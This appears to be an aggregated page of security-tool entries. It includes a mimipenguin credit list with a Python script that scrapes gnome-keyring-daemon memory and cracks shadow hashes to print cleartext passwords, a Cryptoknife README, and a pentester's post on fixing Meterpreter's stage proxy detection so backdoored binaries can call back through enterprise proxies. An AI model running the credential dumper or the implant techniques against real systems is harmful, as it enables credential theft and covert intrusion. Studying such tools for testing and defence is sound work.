- pugilist for cleaning up PID extraction and testing
- ianmiell for cleaning up some of my messy code
- w0rm for identifying a printf error when special chars are involved
- benichmt1 for identifying the multiple authenticated users issue
- ChaitanyaHaritash for identifying special char edge case issues
- ImAWizardLizard for cleaning up the pattern matches with a for loop
- coreb1t for python3 checks, arch support, other fixes
- n1nj4sec for a python2 port and support
- KINGSABRI for the Roadmap proposal
- bourgouinadrien for linking https://github.com/koalaman/shellcheck

Link: https://github.com/huntergregal/mimipenguin
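The core idea described under Details above can be sketched in a few lines of Python (Linux only, run as root; the process name, string lengths and parsing are simplified for illustration and a real run can be slow):

import crypt, re, spwd, subprocess

TARGET = "gnome-keyring-daemon"  # example process to scrape

pid = subprocess.check_output(["pidof", "-s", TARGET], text=True).strip()
candidates = set()
with open(f"/proc/{pid}/maps") as maps, open(f"/proc/{pid}/mem", "rb") as mem:
    for line in maps:
        # only look at writable mappings, where cleartext input tends to live
        if " rw" not in line:
            continue
        start, end = (int(x, 16) for x in line.split()[0].split("-"))
        mem.seek(start)
        try:
            chunk = mem.read(end - start)
        except OSError:
            continue
        candidates.update(re.findall(rb"[ -~]{6,30}", chunk))

# test every printable string against the local shadow hashes
for entry in spwd.getspall():
    if not entry.sp_pwdp.startswith("$"):
        continue
    for word in candidates:
        if crypt.crypt(word.decode(), entry.sp_pwdp) == entry.sp_pwdp:
            print(f"{entry.sp_namp}: {word.decode()}")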
    1 point
  8. Cryptoknife

Cryptoknife is an open source portable utility for hashing, encoding, and encryption through a simple drag-and-drop interface. It also comes with a collection of miscellaneous tools. The mainline branch officially supports Windows and Mac. Cryptoknife is free and licensed GPL v2 or later. It can be used for both commercial and personal use.

Cryptoknife works by checking boxes for the calculations and then dragging files to run the calculation. Cryptoknife performs the work from every checked box on every tab, displays the output in the log and saves it to a log file. By default, very common hashing boxes are pre-checked.

Support

Twitter: @NagleCode
You may also track this project on GitHub.
Secure Anonymous Email: Contact me

Settings and Log

For Windows, the settings are saved as cryptoknife_settings.ini inside the run-time directory. The log file cryptoknife.log is also in the run-time directory. For Mac, settings are saved in Library/Application Support/com.cryptoknife/cryptoknife_settings.ini. The log file is cryptoknife.log and is saved in your Downloads directory. Settings are saved when the app exits. The log is saved whenever the console is updated.

Hashing

Simply check the boxes for the algorithms to use, and then drag-and-drop your directory or file.

- MD5, MD4, MD2
- SHA-1, 224, 256, 384, 512
- CRC-32 Checksum

There is also direct input available. Cryptoknife will perform all hashing algorithms on direct input.

Encoding

Except for line-ending conversion, Cryptoknife appends a new file extension when performing its work. However, it is still very easy to drag-and-drop and encode/encrypt thousands of files. With great power comes great responsibility.

- Base64
- HEX/Binary
- DOS/Unix EOL

There is also direct input available. Results are displayed (which may not be viewable for binary results).

Encryption

All the encryption algorithms use CBC mode. You may supply your own Key/IV or generate a new one. Note that if you change the bit-level, you need to re-click "Generate", since different bit sizes require different lengths.

- AES/Rijndael CBC
- Blowfish CBC
- Triple DES CBC
- Twofish CBC

Utilities

System Profile gives a listing of RAM, processor, attached drives, and IP addresses. It is also run on start-up. ASCII/HEX is the same conversion interface used by Packet Sender. Epoch/Date is a very common calculation used in development. Password Generator has various knobs to create a secure password.

- System Profile
- ASCII/HEX
- Epoch/Date convert
- Password Generator

Using Cryptoknife, an open-source utility which generates no network traffic, is a very safe way to generate a password.

Building

Cryptoknife uses these libraries:

- https://www.cryptopp.com/
- https://www.qt.io/download-open-source/

All the project files are statically linked to create a single executable on Windows. Mac uses dynamic linking since apps are just directories.

Sponsorships

Would you like your name or brand listed on this website? Please contact me for sponsorship opportunities.

License

GPL v2 or later. Contact me if you require a different license.

Copyright

Cryptoknife is wholly owned and copyright © - @NagleCode - DanNagle.com - Cryptoknife.com

Link: https://github.com/dannagle/Cryptoknife
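For reference, the most common digests the tool pre-checks can be reproduced with Python's standard library; a small sketch over an arbitrary file (the file name is a placeholder):

import hashlib, sys, zlib

path = sys.argv[1] if len(sys.argv) > 1 else "example.bin"  # placeholder file

md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
crc = 0
with open(path, "rb") as fh:
    for block in iter(lambda: fh.read(1 << 20), b""):
        md5.update(block); sha1.update(block); sha256.update(block)
        crc = zlib.crc32(block, crc)

print("MD5    ", md5.hexdigest())
print("SHA-1  ", sha1.hexdigest())
print("SHA-256", sha256.hexdigest())
print("CRC-32 ", f"{crc & 0xffffffff:08x}")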
    1 point
  9. Juan Caillava - Pentester at Deloitte Argentina.
May 4

A Meterpreter and Windows proxy case

Introduction

A few months ago, while I was testing a custom APT that I developed for attack simulations in an enterprise Windows environment that allows access to the Internet via proxy, I found that the HTTPS staged Meterpreter payload was behaving unexpectedly. To tell the truth, at the beginning I was not sure whether it was a problem related to the Meterpreter injection in memory that my APT was doing, or something else. As the APT had to be prepared to deal with proxy environments, I had to find out the exact problem and fix it. After doing a thorough analysis of the situation, I found out that the Meterpreter payload I was using (windows/meterpreter/reverse_https, Framework version: 4.12.40-dev) may not be working properly.

Before starting with the technical details, I will provide data about the testing environment:

- Victim OS / IP: Windows 8.1 x64 Enterprise / 10.x.x.189
- Internet access: via an authenticated proxy ("Automatically detect settings" IE configuration / DHCP option)
- Proxy socket: 10.x.x.20:8080
- External IP via proxy: 190.x.x.x
- Attacker machine: 190.y.y.y
- Meterpreter payload: windows/meterpreter/reverse_https

Note: as a reminder, the reverse_https payload is a staged one. That is, the first code that is executed on the victim machine downloads and injects in memory (via reflective injection) the actual Meterpreter DLL code (metsrv.x86.dll or metsrv.x64.dll).

The first screenshots show the external IP of the victim machine, the proxy configuration ("Automatically detect settings") of the victim machine, and the use of "autoprox.exe" on the victim machine; observe that a proxy configuration was obtained via DHCP (option 252). It can be observed that, for "www.google.com", the proxy 10.x.x.20:8080 has to be used. This can also be learnt by manually downloading and inspecting the rules contained in the wpad.dat file (its location was provided via DHCP option 252).

Note: according to my analysis, autoprox.exe (by pierrelc@microsoft.com) uses the Windows API to search first for the proxy settings received via DHCP and, if that fails, for proxy settings that can be obtained via DNS.

Analysis

During the analysis of the problem I will be changing a few lines of code of the Meterpreter payload and testing it on the victim machine, therefore it is required to create a backdoored binary with an HTTPS reverse Meterpreter staged payload (windows/meterpreter/reverse_https) or use a web delivery module. Whatever you want to use is ok.

Note: a simple backdoored binary can be created with Shellter and any trusted binary such as putty.exe; otherwise, use the Metasploit web delivery payload with Powershell. Remember that we will be modifying the stage payload and not the stager, therefore you just need to create one backdoored binary for the whole experiment.

Let's execute the backdoored binary on the victim machine and observe what happens in the Metasploit listener that is running on the attacker machine. The following screenshot shows the MSF handler running on the attacker machine (port 443), and then a connection established with the victim machine (source port 18904). It can be observed that the victim machine is reaching the handler and we are supposedly getting a Meterpreter shell.
However, it was impossible to get a valid answer for any command I introduced, and then the session closed.

From a high level perspective, when the stager payload (a small piece of code) is executed on the victim machine, it connects back to the listener to download a bigger piece of code (the stage Meterpreter payload), injects it in memory and gives control to it. The loaded Meterpreter payload then connects again to the listener, allowing interaction with the affected system. From what we can see so far, the stager was successfully executed and was able to reach the listener through the proxy. However, when the stage payload was injected (if it worked), something went wrong and it died.

Note: in case you are wondering, the AV was verified and no detection was observed. Also, in case the network administrator decided to spy on the HTTPS content, I manually created a PEM certificate, configured the listener to use it, and then compared the fingerprint of the newly created certificate against the fingerprint observed with the browser when the Metasploit listener was visited manually, to make sure the certificate was not being replaced in transit. This motivated me to continue looking for the problem elsewhere.

The next, perhaps obvious, step was to sniff the traffic from the victim machine to understand more about what is happening (from a blackbox perspective). The following screenshot shows the traffic captured with Wireshark on the victim machine. In it, a TCP connection can be observed between the victim machine (10.x.x.189) and the proxy server (10.x.x.20:8080), where a CONNECT method is sent (first packet) from the victim asking for a secure communication (SSL/TLS) with the attacker machine (190.x.x.x:443). In addition, observe the NTLM authentication used in the request (NTLMSSP_AUTH) and the "Connection established" response from the proxy (HTTP/1.1 200). After that, an SSL/TLS handshake took place. It is worth mentioning that this capture shows the traffic sent and received during the first part, that is, when the stager payload was executed. After the connection is established, a classic SSL/TLS handshake is performed between the two ends (the client and the server), and then, within the encrypted channel, the stage payload is transferred from the attacker machine to the victim.

Now that we have confirmed that the first part (staging) of the Meterpreter "deployment" was working, what follows is to understand what is happening in the second part, that is, the communication between the stage payload and the listener. In order to do that, we just need to continue analyzing the traffic captured with Wireshark. The following screenshot shows what would be the last part of the communication between the stager payload and the listener, and then an attempt to reach the attacker machine directly from the victim (without using the proxy).

In the first 5 packets of the capture, we can see the TCP connection termination phase (FIN,ACK; ACK; FIN,ACK; ACK) between the victim machine (10.x.x.189) and the proxy server (10.x.x.20). Then, it can be observed that the 6th packet contains a TCP SYN flag (to initiate a TCP handshake) sent from the victim machine to the attacker machine directly, that is, without using the proxy server as an intermediary.
Finally, observe the 7th packet received by the victim machine from the gateway, indicating that the destination (the attacker machine) is not directly reachable from this network (remember I told you that it was required to use a proxy server to reach the Internet). So, after observing this traffic capture and seeing that the Meterpreter session died, we can conclude that the Meterpreter stage payload was unable to reach the listener because, for some reason, it tried to reach it directly, that is, without using the system proxy server in the same way the stager did.

What we are going to do now is download the Meterpreter source code and try to understand the root cause of this behavior. To do this, we should follow the "Building - Windows" guide published in the Rapid7 github (go to the references for a link). Now, as suggested by the guide, we can use Visual Studio 2013 to open the project solution file (\metasploit-payloads\c\meterpreter\workspace\meterpreter.sln) and start exploring the source code. After exploring the code, we can observe that within the "server_transport_winhttp.c" source code file there is proxy settings logic implemented (please go to the references to locate the source file quickly). The following screenshot shows the part of the code where the proxy setting is evaluated by Meterpreter.

As I learnt from the Meterpreter reverse_https related threads on github, it will first try to use the WinHTTP Windows API to get access to the Internet, and in this portion of code we are seeing exactly that. As we can see, the code has plenty of dprintf calls that are used for debugging purposes and that would provide valuable information during our runtime analysis. In order to make the debugging information available to us, it is required to modify the DEBUGTRACE pre-processor constant in the common.h source code header file, which will make the server (the Meterpreter DLL loaded in the victim) produce debug output that can be read using Visual Studio's Output window, DebugView from SysInternals, or Windbg. The first of the following screenshots shows the original DEBUGTRACE constant commented out in the common.h source code file; the second shows the required modification to obtain debugging information.

Now, it is time to build the solution and copy the resulting "metsrv.x86.dll" binary file saved at "\metasploit-payloads\c\meterpreter\output\x86\" to the attacker machine (where the Metasploit listener is), into the corresponding path (in my case, /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-payloads-1.1.26/data/meterpreter/). On the debugging machine, let's run the "DebugView" program and then execute the backdoored binary again to have the Meterpreter stager running on it. The following screenshot shows the debugging output produced on the victim machine.

From the debugging information (logs) generated by Meterpreter, it can be observed that lines 70 through 74 correspond to lines 48 through 52 of the server_transport_winhttp.c source code file, where the dprintf statements are. In particular, line 71 ("[PROXY] AutoDetect: yes") indicates that the proxy "AutoDetect" setting was found on the victim machine. However, the proxy URL obtained was NULL. Finally, after that, it can be observed that the stage tried to send a GET request (on line 75). Thanks to the debugging output generated by Meterpreter, we are now closer to the root of the problem.
It looks like the piece of code that handles the Windows proxy settings is not properly implemented. In order to solve the problem, we have to analyze the code, modify it and test it. As building the Meterpreter C solution multiple times, copying the resulting metsrv DLL to the attacker machine and testing it against the victim is too time consuming, I thought it would be easier and less painful to replicate the proxy handling piece of code in Python (ctypes to the rescue) and modify it multiple times on the victim machine.

The following is, more or less, the Meterpreter proxy handling code that can be found in the analyzed version of the server_transport_winhttp.c source code file, but written in Python. Executed on the victim machine, the script shows the same information that was obtained in the debugging logs: the proxy auto configuration setting was detected, but no proxy address was obtained. If you check the code again you will realize that the DHCP and DNS possibilities are handled within the "if" block that evaluates the autoconfiguration URL (ieConfig.lpszAutoConfigUrl). However, this block is not executed if only the AutoDetect option is enabled, and that is exactly what is happening on this particular victim machine.

In this particular scenario (with this victim machine), the proxy configuration is being obtained via DHCP through option 252. The following screenshot shows the DHCP transaction packets sniffed on the victim machine. Observe that the DHCP answer from the server contains option 252 (Private/Proxy autodiscovery) with the URL that should be used to obtain information about the proxy. Remember that this is what we obtained before using the autoprox.exe tool.

Before continuing, it is important to understand the three alternatives that Windows provides for proxy configuration:

- Automatically detect settings: use the URL obtained via DHCP (option 252) or request the WPAD hostname via DNS, LLMNR or NBNS (if enabled).
- Use automatic configuration script: download the configuration script from the specified URL and use it to determine when to use proxy servers.
- Proxy server: manually configured proxy server for different protocols.

So, now that we have more precise information about the root cause of the problem, I will slightly modify the code to specifically consider the Auto Detect possibility. Let's first do it in Python and, if it works, then update the Meterpreter C code and build the Meterpreter payload. The following is the modified Python code:
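(The original post shows the script only as a screenshot; the following is a rough reconstruction of what such a ctypes script might look like, assuming the standard WinHTTP API behaviour - it is a sketch, not the author's exact code. Windows only.)

import ctypes
from ctypes import wintypes

winhttp = ctypes.windll.winhttp
winhttp.WinHttpOpen.restype = ctypes.c_void_p
winhttp.WinHttpGetProxyForUrl.argtypes = [ctypes.c_void_p, wintypes.LPCWSTR, ctypes.c_void_p, ctypes.c_void_p]
winhttp.WinHttpCloseHandle.argtypes = [ctypes.c_void_p]

# flags taken from winhttp.h
WINHTTP_ACCESS_TYPE_NO_PROXY   = 1
WINHTTP_AUTOPROXY_AUTO_DETECT  = 0x00000001
WINHTTP_AUTOPROXY_CONFIG_URL   = 0x00000002
WINHTTP_AUTO_DETECT_TYPE_DHCP  = 0x00000001
WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x00000002

class IE_PROXY_CONFIG(ctypes.Structure):
    _fields_ = [("fAutoDetect", wintypes.BOOL),
                ("lpszAutoConfigUrl", wintypes.LPWSTR),
                ("lpszProxy", wintypes.LPWSTR),
                ("lpszProxyBypass", wintypes.LPWSTR)]

class AUTOPROXY_OPTIONS(ctypes.Structure):
    _fields_ = [("dwFlags", wintypes.DWORD),
                ("dwAutoDetectFlags", wintypes.DWORD),
                ("lpszAutoConfigUrl", wintypes.LPCWSTR),
                ("lpvReserved", ctypes.c_void_p),
                ("dwReserved", wintypes.DWORD),
                ("fAutoLogonIfChallenged", wintypes.BOOL)]

class PROXY_INFO(ctypes.Structure):
    _fields_ = [("dwAccessType", wintypes.DWORD),
                ("lpszProxy", wintypes.LPWSTR),
                ("lpszProxyBypass", wintypes.LPWSTR)]

url = "https://www.google.com/"  # any Internet URL works for the lookup

ie = IE_PROXY_CONFIG()
winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(ie))
print("[PROXY] AutoDetect:", "yes" if ie.fAutoDetect else "no")
print("[PROXY] Auto URL  :", ie.lpszAutoConfigUrl)
print("[PROXY] Proxy     :", ie.lpszProxy)

if ie.fAutoDetect or ie.lpszAutoConfigUrl:
    session = winhttp.WinHttpOpen("proxy-test", WINHTTP_ACCESS_TYPE_NO_PROXY, None, None, 0)
    opts = AUTOPROXY_OPTIONS()
    if ie.lpszAutoConfigUrl:
        opts.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL
        opts.lpszAutoConfigUrl = ie.lpszAutoConfigUrl
    else:
        # this is the case the stock code misses: "Automatically detect settings"
        # with no explicit PAC URL, so ask WinHTTP to probe DHCP (option 252) and DNS
        opts.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT
        opts.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A
    opts.fAutoLogonIfChallenged = True
    info = PROXY_INFO()
    if winhttp.WinHttpGetProxyForUrl(session, url, ctypes.byref(opts), ctypes.byref(info)):
        print("[PROXY] Resolved  :", info.lpszProxy)  # memory is intentionally not freed in this sketch
    winhttp.WinHttpCloseHandle(session)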
In the modified code it can be observed that it now considers the possibility of a proxy configured via DHCP/DNS. Let's now run it and see how it behaves. The output of the modified code on the victim machine shows that it successfully detected the proxy configuration obtained via DHCP, and it is the exact same proxy we observed at the beginning of this article (10.x.x.20). Now that we know that this code works, let's update the Meterpreter C source code (server_transport_winhttp.c) to test it with our backdoored binary. After modifying it, build the solution again, copy the resulting metsrv Meterpreter DLL to the listener machine and run the listener again to wait for the client.

The following screenshot shows the listener running on the attacker machine. Observe how it was possible to successfully obtain a Meterpreter session when the victim machine uses the proxy "Auto Detect" configuration (DHCP option 252 in this case).

Problem root cause

Now, it is time to discuss something you may have wondered about when reading this article: why was the stager able to reach the attacker machine in the first place? What is the difference between the stager payload and the stage one in terms of communications? In order to find the answer to those questions, we first need to understand how Meterpreter works at the moment of this writing.

Let's start at the beginning: the Windows API provides two mechanisms or interfaces to communicate via HTTP(S): WinInet and WinHTTP. In the context of Meterpreter, there are two features that are interesting for us when dealing with the HTTPS communication layer:

- The ability to validate the certificate presented by the HTTPS server (the Metasploit listener running on the attacker machine) to prevent content inspection by agents such as L7 network firewalls. In other words, we want to perform certificate pinning.
- The ability to transparently use the current user's proxy configuration to be able to reach the listener through the Internet.

It turns out that both features cannot be found in the same Windows API, that is:

WinInet:
- Is transparently proxy aware, which means that if the current user's system proxy configuration works for Internet Explorer, then it works for WinInet-powered applications.
- Does not provide mechanisms to perform a custom validation of an SSL/TLS certificate.

WinHTTP:
- Allows you to trivially implement a custom verification of the SSL certificate presented by a server.
- Does not use the current user's system proxy configuration transparently.

Now, in terms of Meterpreter, we have two different stager payloads that can be used:

- The reverse_https Meterpreter payload uses the WinInet Windows API, which means it cannot perform certificate validation, but will use the system proxy transparently. That is, if the user can access the Internet via IE, then the stager can also do it.
- The reverse_winhttps Meterpreter payload uses the WinHTTP Windows API, which means it can perform certificate validation, but the system proxy has to be "used" manually.

The Meterpreter payload itself (the stage payload) uses the WinHTTP Windows API by default and falls back to WinInet in case of error (see the documentation to understand a particular error condition with old proxy implementations), unless the user decided to use "paranoid mode", because WinInet would not be able to validate the certificate, and this is considered a priority.

Note: in the Meterpreter context, "paranoid mode" means that the SSL/TLS certificate signature HAS to be verified and, if it was replaced on the wire (e.g. by a Palo Alto Networks firewall inspecting the content), then the stage should not be downloaded and therefore the session should not be initiated. If the user requires "paranoid mode" for a particular scenario, then the stager will have to use WinHTTP.

Now we have enough background to understand why we faced this problem. I was using the "reverse_https" Meterpreter payload (without caring about "paranoid mode" for testing purposes), which means that the stager used the WinInet API to reach the listener, that is, it was transparently using the current user proxy configuration that was properly working.
However, as the Meterpreter stage payload uses the WinHTTP API by default and that code has, in my view, a bug, it was not able to reach back to the listener on the attacker machine. I think this answers both questions.

Proxy identification approach

Another question that we haven't answered yet is: what would be the best approach to obtain the current user's proxy configuration when using the WinHTTP Windows API? To answer that, we need to find out what the precedence is when more than one proxy is configured on the system, and what Windows does when one option is not working (does it try another option?).

From what I found, the proxy settings in the Internet Options configuration dialog box are presented in the order of their precedence: first the "Automatically detect settings" option is checked, next the "Use automatic configuration script" option, and finally the "Use a proxy server for your LAN…" option. In addition, a sample for using the WinHTTP API can be found in the "Developer code sample" section of Microsoft MSDN, which states:

// Begin processing the proxy settings in the following order:
// 1) Auto-Detect if configured.
// 2) Auto-Config URL if configured.
// 3) Static Proxy Settings if configured

This suggests the same order of precedence we already mentioned.

Fault tolerant implementation

One last question: what happens if a host is configured with multiple proxy options and the one with precedence is not working? Will Windows continue with the next option until it finds one that works? To answer this, we could either perform a little experiment or spend hours and hours reversing the Windows components involved (mainly wininet.dll), so let's start with the experiment, which will certainly be less time-consuming.

Lab settings

In order to further analyze the Windows proxy settings and capabilities, I created a lab environment with the following features:

- A Windows domain with one Domain Controller
  - Domain: lab.bransh.com
  - DC IP: 192.168.0.1
  - DHCP service (192.168.0.100–150)
- Three Microsoft Forefront TMG (Threat Management Gateway) servers
  - tmg1.lab.bransh.com: 192.168.0.10
  - tmg2.lab.bransh.com: 192.168.0.11
  - tmg3.lab.bransh.com: 192.168.0.12
  - Every TMG server has two network interfaces: the "internal" interface (range 192.168.0.x) is connected to the domain and allows clients to reach the Internet through it; the "external" interface is connected to a different network and is used by the proxy to get direct Internet access.
- A Windows client (Windows 8.1 x64)
  - IP via DHCP
  - Proxy configuration:
    - Via DHCP (option 252): tmg1.lab.bransh.com
    - Via script: http://tmg2.lab.bransh.com/wpad.dat
    - Manual: tmg3.lab.bransh.com:8080
  - The client cannot directly reach the Internet
  - Firefox is configured to use the system proxy

The following screenshot shows the proxy settings configured on the Windows client host. The next screenshot shows the proxy set via DHCP using option 252:

Note: the "Automatically detect settings" option can find the proxy settings either via DHCP or via DNS. When using the Windows API, it is possible to specify either one or both.

With a simple piece of code that uses the API provided by Windows, it is possible to test a few proxy scenarios. Again, I wrote the code in Python, as it is very easy to modify and re-run without having to compile C/C++ code on the testing machine every time a change is needed (though you can do it in whatever language you prefer):
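Since the original test script is shown only as a screenshot in the source article, here is a minimal Python approximation of it. The structure layouts and flag values follow the documented WinHTTP API; the agent string and target URL are placeholders, and error handling is deliberately thin.

import ctypes
import http.client
from ctypes import wintypes

winhttp = ctypes.windll.winhttp
winhttp.WinHttpOpen.restype = ctypes.c_void_p

WINHTTP_ACCESS_TYPE_NO_PROXY   = 1
WINHTTP_AUTOPROXY_AUTO_DETECT  = 0x01
WINHTTP_AUTOPROXY_CONFIG_URL   = 0x02
WINHTTP_AUTO_DETECT_TYPE_DHCP  = 0x01
WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x02

class IE_PROXY_CONFIG(ctypes.Structure):      # WINHTTP_CURRENT_USER_IE_PROXY_CONFIG
    _fields_ = [("fAutoDetect",       wintypes.BOOL),
                ("lpszAutoConfigUrl", wintypes.LPWSTR),
                ("lpszProxy",         wintypes.LPWSTR),
                ("lpszProxyBypass",   wintypes.LPWSTR)]

class AUTOPROXY_OPTIONS(ctypes.Structure):    # WINHTTP_AUTOPROXY_OPTIONS
    _fields_ = [("dwFlags",                wintypes.DWORD),
                ("dwAutoDetectFlags",      wintypes.DWORD),
                ("lpszAutoConfigUrl",      wintypes.LPCWSTR),
                ("lpvReserved",            ctypes.c_void_p),
                ("dwReserved",             wintypes.DWORD),
                ("fAutoLogonIfChallenged", wintypes.BOOL)]

class PROXY_INFO(ctypes.Structure):           # WINHTTP_PROXY_INFO
    _fields_ = [("dwAccessType",    wintypes.DWORD),
                ("lpszProxy",       wintypes.LPWSTR),
                ("lpszProxyBypass", wintypes.LPWSTR)]

def _pac_lookup(session, target_url, flags, autodetect_flags=0, pac_url=None):
    # Ask WinHTTP to resolve the proxy for target_url (WPAD and/or PAC script).
    opts = AUTOPROXY_OPTIONS(dwFlags=flags, dwAutoDetectFlags=autodetect_flags,
                             lpszAutoConfigUrl=pac_url, fAutoLogonIfChallenged=True)
    info = PROXY_INFO()
    ok = winhttp.WinHttpGetProxyForUrl(ctypes.c_void_p(session), target_url,
                                       ctypes.byref(opts), ctypes.byref(info))
    return info.lpszProxy if ok else None     # test script: returned buffers are not freed

def GetProxyInfoList(pProxyConfig, target_url):
    # Return every proxy the current user's settings could yield for target_url:
    # auto-detect (DHCP option 252 / DNS WPAD), configuration script, static proxy.
    proxies = []
    session = winhttp.WinHttpOpen("proxy-test", WINHTTP_ACCESS_TYPE_NO_PROXY,
                                  None, None, 0)
    if pProxyConfig.fAutoDetect:
        p = _pac_lookup(session, target_url, WINHTTP_AUTOPROXY_AUTO_DETECT,
                        WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A)
        if p:
            proxies.append(("auto-detect", p))
    if pProxyConfig.lpszAutoConfigUrl:
        p = _pac_lookup(session, target_url, WINHTTP_AUTOPROXY_CONFIG_URL,
                        pac_url=pProxyConfig.lpszAutoConfigUrl)
        if p:
            proxies.append(("config-script", p))
    if pProxyConfig.lpszProxy:
        proxies.append(("static", pProxyConfig.lpszProxy))
    return proxies

def CheckProxyStatus(proxy, target_server, target_port):
    # GET the root resource (/) of target_server through the proxy to verify
    # that the proxy actually provides access to it.
    proxy = proxy.split(";")[0]               # keep the first entry if several are returned
    host, _, port = proxy.partition(":")
    try:
        conn = http.client.HTTPConnection(host, int(port or 8080), timeout=10)
        conn.request("GET", "http://%s:%d/" % (target_server, target_port))
        return "HTTP %d" % conn.getresponse().status
    except Exception as e:
        return "FAILED (%s)" % e

if __name__ == "__main__":
    cfg = IE_PROXY_CONFIG()
    winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(cfg))
    for source, proxy in GetProxyInfoList(cfg, "http://example.com/"):
        print(source, proxy, CheckProxyStatus(proxy, "example.com", 80))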
The code above has two important functions:

- GetProxyInfoList(pProxyConfig, target_url): evaluates the proxy configuration for the current user and returns a list of proxy network sockets (IP:PORT) that could be used for the specified URL. It is important to note that the list contains proxy addresses that could potentially be used to access the URL; it does not mean that those proxy servers are actually working. For example, the list could contain a proxy read from a wpad.dat file specified via the "Use automatic configuration script" option, yet that proxy may not be available when trying to access the target URL.
- CheckProxyStatus(proxy, target_server, target_port): tests a proxy against a target server and port (using the root resource URI: /) to verify that the proxy actually provides access to the resource. This function helps to decide whether a given proxy, when more than one is available, can be used or not.

Testing scenario #1

In this scenario, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled after the client machine has started. This means that the only option for the client machine to access the Internet is through the proxy server TMG3. The following screenshot shows the output of the script, as well as how IE and Firefox deal with the situation:

The testing script shows the following:

- The option "Automatically detect settings" is enabled and the obtained proxy is "192.168.0.10:8080" (Windows downloaded the WPAD.PAC file in the background and cached the obtained configuration before the proxy's internal interface was disabled). However, the proxy is not working: as the internal interface of TMG1 was disabled, it was not possible to actually reach it over the network (a timeout was obtained).
- The option "Use automatic configuration script" is enabled and the obtained proxy is "192.168.0.11:8080" (again, Windows downloaded the WPAD.PAC file in the background and cached the configuration before the proxy's internal interface was disabled). However, the proxy is not working: as the internal interface of TMG2 was disabled, it was not possible to actually reach it over the network (a timeout was obtained).
- The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy was used successfully and it was possible to send a request through it.

Observe that neither IE nor Firefox was able to reach the Internet with this configuration. However, a custom application that uses tmg3 as a proxy server would be able to do so.

Testing scenario #2

In this scenario, very similar to #1, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled before the client machine starts. This means that the only option for the client machine to access the Internet is through the proxy server TMG3. The following screenshot shows the output of the script, as well as how IE and Firefox deal with the situation:

When running our testing code, we can observe the following:

- The option "Automatically detect settings" is enabled (tmg1.lab.bransh.com/wpad.dat), but no proxy was obtained. This happened because the proxy server (tmg1) was not reachable when the host received the DHCP configuration (and option 252 in particular), so it was not able to download the wpad.dat proxy configuration file.
- The option "Use automatic configuration script" is enabled and the configured URL for the configuration file is "tmg2.lab.bransh.com/wpad.dat". However, it was not possible to download the configuration script because the server is not reachable.
- The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy was used successfully and it was possible to send a request through it.

Observe that IE was able to understand the configuration and reach the Internet; Firefox, however, was not.

Testing scenario #3

In this scenario, the internal network interface (192.168.0.11) of the proxy server TMG2 was disabled before the client machine started. This means that client machines can access the Internet through proxy servers TMG1 and TMG3. The following screenshot shows the output of the script, as well as how IE and Firefox deal with the situation:

When running our testing code, we can observe the following:

- The option "Automatically detect settings" is enabled and it is possible to access the Internet through the obtained proxy (192.168.0.10:8080).
- The option "Use automatic configuration script" is enabled and the configured URL for the configuration file is "tmg2.lab.bransh.com/wpad.dat". However, as the network interface of this proxy was disabled, it was not possible to download the configuration script.
- The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy was used successfully and it was possible to send a request through it.

In addition, observe that IE was able to understand the configuration and reach the Internet; Firefox, however, was not.

Testing scenario #4

In this scenario, only the internal network interface (192.168.0.11) of the proxy server TMG2 is enabled. When running our testing code, we can observe the following:

- The option "Automatically detect settings" is enabled, but it is not possible to access the Internet through the corresponding proxy (192.168.0.10:8080).
- The option "Use automatic configuration script" is enabled and the configured URL for the configuration file is "tmg2.lab.bransh.com/wpad.dat". The obtained proxy is 192.168.0.11:8080 and it is possible to reach the Internet using it.
- The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy is not reachable and a timeout is obtained.

In addition, observe that IE was not able to understand the configuration and reach the Internet, whereas Firefox successfully used the configuration and got Internet access.

Testing scenario #5

In this scenario, the internal network interfaces of all three proxy servers are enabled, but the external interfaces of the servers TMG1 and TMG2 were disabled. When running our testing code, we can observe the following:

- The option "Automatically detect settings" is enabled and the specified proxy (192.168.0.10:8080) is reachable. However, it answers with an error (status code 502) indicating that it is not possible to reach the Internet through it.
- The option "Use automatic configuration script" is also enabled and the specified proxy (192.168.0.11:8080) is reachable. However, it also answers with an error (status code 502) indicating that it is not possible to reach the Internet through it.
- The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy is reachable and it does provide Internet access.

Observe that neither IE nor Firefox was able to access the Internet. However, a custom application that uses TMG3 as a proxy server would be able to do so.
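As a side note before the conclusion: a custom application that wanted to survive these scenarios could simply walk a candidate list (for example the output of GetProxyInfoList above) and keep the first proxy that actually works. A small, self-contained sketch of that idea follows; it is not from the original article and the probe URL is a placeholder.

import urllib.request

def first_working_proxy(candidates, probe_url="http://example.com/", timeout=10):
    # Given candidate proxies as "host:port" strings, return the first one
    # that can actually fetch probe_url, or None if none of them work.
    for proxy in candidates:
        opener = urllib.request.build_opener(
            urllib.request.ProxyHandler({"http": "http://" + proxy,
                                         "https": "http://" + proxy}))
        try:
            opener.open(probe_url, timeout=timeout)
            return proxy
        except Exception:
            continue
    return None

# Example with the lab proxies used in the scenarios above:
# first_working_proxy(["192.168.0.10:8080", "192.168.0.11:8080",
#                      "tmg3.lab.bransh.com:8080"])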
Conclusion

In certain scenarios, like the one exposed in the first part of this post, we will find that our favorite tool does not behave as expected. In those situations we mainly have two options: try to find another solution, or get our hands dirty and make it work. For the particular enterprise scenario I described, the fix applied to Meterpreter worked properly and, after compiling its DLL, it was possible to make it work with the proxy configuration described. I'm not sure whether this fix will be applied to the Meterpreter code, but if you find yourself facing something like this, now you know what to do.

